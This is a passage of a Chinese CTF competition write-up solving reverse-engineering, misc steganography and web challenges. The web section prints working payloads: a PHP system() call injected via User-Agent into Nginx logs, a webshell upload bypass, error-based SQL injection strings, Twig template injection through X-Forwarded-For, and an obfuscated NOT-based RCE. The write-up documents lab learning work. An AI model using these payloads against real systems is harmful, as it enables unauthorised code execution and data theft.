solver.add(-e[0] * 10461 - e[1] * 13332 - e[2] * 83172 - e[3] * 89839 + e[4] * 49177 - e[5] * 67027 + e[6] * 52836 - e[7] * 32351 - e[8] * 36506 - e[9] * 85716 - e[10] * 18248 - e[11] * 71756 + e[12] * 11550 + e[13] * 10401 + e[14] * 58224 + e[15] * 62004 == -20383242)
solver.add(e[0] * 62959 - e[1] * 87830 - e[2] * 28501 + e[3] * 72711 - e[4] * 68592 + e[5] * 85823 - e[6] * 12043 - e[7] * 59333 - e[8] * 97667 + e[9] * 13926 + e[10] * 42558 - e[11] * 53575 + e[12] * 35475 - e[13] * 56414 - e[14] * 54865 - e[15] * 87249 == -21048644)
solver.add(e[0] * 44250 - e[1] * 55795 - e[2] * 17322 - e[3] * 65328 + e[4] * 91117 + e[5] * 23599 - e[6] * 95326 - e[7] * 26138 + e[8] * 77040 + e[9] * 14484 + e[10] * 11081 + e[11] * 72720 - e[12] * 35901 - e[13] * 46271 + e[14] * 75508 + e[15] * 34175 == 9002229)
solver.add(-e[0] * 39329 + e[1] * 54794 + e[2] * 47607 - e[3] * 61681 + e[4] * 68093 - e[5] * 51165 + e[6] * 54144 - e[7] * 33982 + e[8] * 69011 + e[9] * 79756 + e[10] * 83202 - e[11] * 43088 + e[12] * 89025 - e[13] * 47457 + e[14] * 24331 + e[15] * 39074 == 27513655)
solver.add(-e[0] * 82498 + e[1] * 62338 + e[2] * 37915 - e[3] * 70538 - e[4] * 79713 - e[5] * 66707 + e[6] * 78552 + e[7] * 51070 - e[8] * 44539 - e[9] * 74338 + e[10] * 46155 + e[11] * 97700 - e[12] * 18565 + e[13] * 61269 - e[14] * 48516 + e[15] * 32732 == 4477798)
solver.add(e[0] * 70267 - e[1] * 53384 + e[2] * 99567 - e[3] * 24849 - e[4] * 77728 - e[5] * 43754 + e[6] * 95738 + e[7] * 45977 + e[8] * 19509 - e[9] * 14260 + e[10] * 57637 + e[11] * 39048 - e[12] * 44992 - e[13] * 45107 - e[14] * 24571 - e[15] * 52549 == -360409)
solver.add(-e[0] * 44685 + e[1] * 41470 + e[2] * 93450 + e[3] * 74425 - e[4] * 78655 - e[5] * 59511 - e[6] * 76950 - e[7] * 81141 - e[8] * 94285 + e[9] * 77516 - e[10] * 18621 + e[11] * 88477 - e[12] * 46913 - e[13] * 76457 + e[14] * 45201 + e[15] * 78597 == -577319)
solver.add(-e[0] * 46140 - e[1] * 81097 - e[2] * 99877 + e[3] * 58736 - e[4] * 99036 + e[5] * 52168 - e[6] * 52321 - e[7] * 94841 - e[8] * 14316 - e[9] * 13365 + e[10] * 15994 - e[11] * 58210 + e[12] * 42112 - e[13] * 65677 + e[14] * 63161 - e[15] * 29028 == -25379650)
solver.add(-e[0] * 12571 - e[1] * 21323 + e[2] * 10818 + e[3] * 77335 - e[4] * 60343 - e[5] * 76014 - e[6] * 59738 + e[7] * 26112 - e[8] * 86749 + e[9] * 19794 - e[10] * 23832 - e[11] * 88221 - e[12] * 28711 + e[13] * 43034 + e[14] * 77706 + e[15] * 26727 == -10344735)
solver.add(e[0] * 31000 - e[1] * 73897 - e[2] * 70258 - e[3] * 62257 - e[4] * 90555 + e[5] * 55147 + e[6] * 11481 - e[7] * 83038 + e[8] * 56923 + e[9] * 35109 + e[10] * 50520 + e[11] * 47625 + e[12] * 77072 + e[13] * 81315 - e[14] * 72958 + e[15] * 83192 == 6793130)
solver.add(e[0] * 80898 + e[1] * 47590 - e[2] * 48110 + e[3] * 95070 - e[4] * 61123 + e[5] * 86752 - e[6] * 27958 - e[7] * 67162 + e[8] * 65280 + e[9] * 79917 - e[10] * 21768 - e[11] * 98200 - e[12] * 53083 + e[13] * 19953 + e[14] * 23497 - e[15] * 35363 == -3458033)
if solver.check() == sat:
    model = solver.model()
    solution = [model[e[i]] for i in range(16)]
    print("Solution:", solution)
else:
    print("No solution found.")

image-20241016193650879

sm4加密模式是ECB,不需要IV向量,直接用工具解出

image-20241016193739195

合成大硅胶

首先可以定位到这里的base64编码

image-20241023190830593

编码出来时是fake flag

看到下面有个for 循环很可疑

image-20241023190926784

全局搜索storeField
image-20241023190954723

便可以找到一个数组image-20241023191035281

下面这个for循环是将上面的数组一排一排地传入storeField

结合这里有个tohexstring,多次尝试疑似可以成功的编码

image-20241023191202687

最后是将上面的数组每个元素转化为十六进制拼接起来,然后转化为ascii码,base64解码

from base64 import *
hex_string = "546c4e5451315247657a51324e544a6a4d6a5a6c4c5749314e6d55744e4455785a6931694e6d59304c574d304e6a56694f444d774f574a6a4e58303d"
array = [hex_string[i:i+2] for i in range(0, len(hex_string), 2)]
int_array = [int(x, 16) for x in array]
ascii_array = [chr(x) for x in int_array]
ascii_string = ''.join(ascii_array)
print(b64decode(ascii_string))

image-20241023191645036

中间有个小插曲,就是我的高版本jadx找不到storeField下面的数组,后面换了个低版本jadx打开才看到,不知道为什么

Misc

ez-QR

gif分帧合成二维码

image-20241013152001960

怎么全是01,我flag呢

用gpt梭成一个二维码,1为黑色0为白色

image-20241013151342401

天干物燥,注意防火

图中有个博文广告,上高德搜

image-20241020150735871

image-20241020150911758

定位广安市广安区

关键词搜索

image-20241020151124243

将时间转化为md5小23位就行

image-20241020151301445

少年的ctf奇遇

后半段flag:随波逐流一键修复宽高

image-20241013144821750

前半段flag:lsp隐写,RGB,三色全调0

image-20241013145118787

来听歌啦!!!

非预期接:用十六进制工具查看源码,一眼丁真

image-20241013145200119

逆天方式ADS

首先根据提示了解ADS

image-20241017194057116

然后根据提示了解albam

image-20241017194142794

解压,一眼猪圈密码

image-20241017194228741

解密即可

day1

base64隐写隐藏解压密码

image-20241013143922071

然后base64转图片

import base64
from PIL import Image
from io import BytesIO
base64_string ='base码'
base64_string = base64_string.replace(' ', '').replace('\n', '')
image_data = base64.b64decode(base64_string)
image = Image.open(BytesIO(image_data))
image.save('output.jpg', 'JPEG')  

image-20241013145221313

day2

SSTV隐写 --->rar密码

解压后还没想好怎么做

image-20241013153925615

wc,是巨硬领域大蛇!

第一段flag:

识别文件头,发现是pdf文件,改格式打开

image-20241018155645480

想到pdf隐写

使用wbStego4.3open.exe

image-20241018155734187

无密码,直接点点点,出flagimage-20241018155858097

第二段flag:

zip中有大量xml文件,搜索即可得知这是office的文件,flag2是docx,修改后缀后打开

把隐藏给关了

image-20241018160136235

第三段flag:

这是xlsx表格,但有了上一轮的经验,直接打开源文件查了,然后在第二个表中找到这里的东西,这是arcii字符,直接转化即可

image-20241018154029452

image-20241018160318743

所有拼接起来即可

Web

php躲猫猫

进入/getfile.php并按要求md5绕过

然后尝试php伪协议利用include漏洞失败

用wappalyzer查看web服务器

image-20241011140701309

服务器是Nginx,上网搜素关键词便能查到Nginx日志注入

但我查到的网上都说的用webshell来做,但他们都是get传参,这个是post我不知道咋弄,但都是user agent注入,而且是输入php文件,直接输入<?php system('cat /f1ag,php');?>

成功爆出来了

image-20241011142331673

The Beginning

ctrl U打开看源码

image-20241013141517503

UploadBaby

前端上传jpg

burp抓包后端改php传webshell,蚁剑连接

image-20241013141909768

http标头

Date :Tue, 20 Aug 2024 00:00:00 GMT

User-Agent : BlackMonkey

Cookie:cookie=BlackMonkey

Referer:wukong

X-Forwarded-For:127.0.0.1

image-20241013141326304

ez_sql

报错注入

爆出数据库名字
-1'and(select extractvalue(1,concat('~',(select database()))))
爆出所有数据库名
-1'and(select extractvalue(1,concat('~',(select group_concat(schema_name) from information_schema.schemata))))#
爆出数据库ctf下所有的表
-1'and(select extractvalue(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema='ctf'))))#
爆出test_db数据库下test_tb表所有的列名
-1'and(select extractvalue(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_name="ctf" and table_schema='flag'))))#
查询flag
-1'and(select extractvalue(1,concat('~',(select substr((select data from flag), 1 , 31)))))#  0-30位 左边30位


-1'and(select extractvalue(1,concat('~',(select substr((select data from flag), 31 , 60)))))#  31-60位 右边边31位

image-20241013141139138

看看ip

xff注入

X-Forwarded-For: 1 测试可否回显

PHP可能存在Twig模版注入漏洞

X-Forwarded-For: {{7*7}} 执行

X-Forwarded-For: {{system('ls /')}}爆表

X-Forwarded-For: {{system('cat /flag')}} payload

image-20241013135948061

青春莫尔斯冲锋狙不会梦到pro速帕里46轮椅人

无符号rce,直接尝试各种脚本,首先异或是不行的,或貌似可以,但取反简单,我就去抄了个取反的

payload:(~%8F%97%8F%96%91%99%90)();

image-20241015083900740

posted @ 2024-10-28 13:46  结城希亚  阅读(254)  评论(2编辑  收藏  举报